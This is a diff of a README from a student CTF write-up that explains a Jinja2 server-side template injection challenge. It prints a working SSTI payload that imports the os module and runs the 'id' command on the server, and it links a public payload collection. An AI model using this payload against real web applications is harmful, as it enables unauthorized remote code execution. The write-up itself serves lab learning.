KuroSalsa/Writeups/NTU CZ4067 CTF/Coruscant/Super Space Tech Inc/README.md

 <br />![alt text](img/Picture5.png)

 <br />In this challenge, all of these are unnecessary as the description states it is running a python web server (Jinja2).

-SSTI Payloads can be found in PayloadsAllTheThings (https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md)
+<br />SSTI Payloads can be found in **PayloadsAllTheThings** https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md

-<br />We will use the following payload to execute the **id** command via Remote Code Execution (RCE) in Jinja2 syntax
+We will use the following payload to execute the **id** command via Remote Code Execution (RCE) in Jinja2 syntax
 ```
 {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
 ```